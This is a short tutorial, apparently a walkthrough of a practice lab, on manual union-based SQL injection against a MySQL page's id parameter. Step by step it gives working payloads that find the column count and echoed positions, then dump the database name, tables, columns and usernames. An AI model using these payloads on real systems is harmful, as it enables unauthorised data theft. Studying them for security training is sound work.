1. Determine the injection type
(1) The page takes a parameter id that looks numeric: ?id=1
(2) Enter ?id=1'
The page returns a database error.
(3) Enter ?id=1"
The single quote produces an error while the double quote displays normally, so the value sits inside a single-quoted string literal on the server side: this is string (character) injection, and every payload has to start by closing that quote with '.
2. Determine the number of columns
(1) Enter ?id=1' order by 1 --+ (--+ is a comment: -- comments out the rest of the original query, and the + URL-decodes to the space that MySQL requires after -- for it to count as a comment)
(2) Enter ?id=1' order by 2 --+
(3) Enter ?id=1' order by 3 --+
(4) Enter ?id=1' order by 4 --+
order by 1 to 3 display normally and order by 4 errors, so the query returns three columns.
3. Find the display positions, which determine where the manual injection payload goes
(1) Enter ?id=-1' union select 1,2,3 --+ (a UNION query: the part before union is the original query, the part after it is ours; with id=-1 the original query matches no row, so whatever the page shows comes from our select, which is why id=-1 is used rather than id=1)
The marker numbers echoed on the page mark the display positions: position 3 is echoed here (the payloads in the next step use position 2, which is echoed as well), and the manual injection payload replaces the number at an echoed position.
4. Injection
(1) Dump the current database name: ?id=-1' union select 1,database(),3 --+
(2) Dump the table names: ?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security" --+
(3) Dump the columns of one table, users here: ?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users" --+
(4) Dump the values of a column, username in the users table here: ?id=-1' union select 1,group_concat(username),3 from security.users --+
group_concat joins all rows into one value so they fit in a single display position; MySQL truncates that value at group_concat_max_len (1024 bytes by default), so for a large table page through the rows with limit N,1 instead.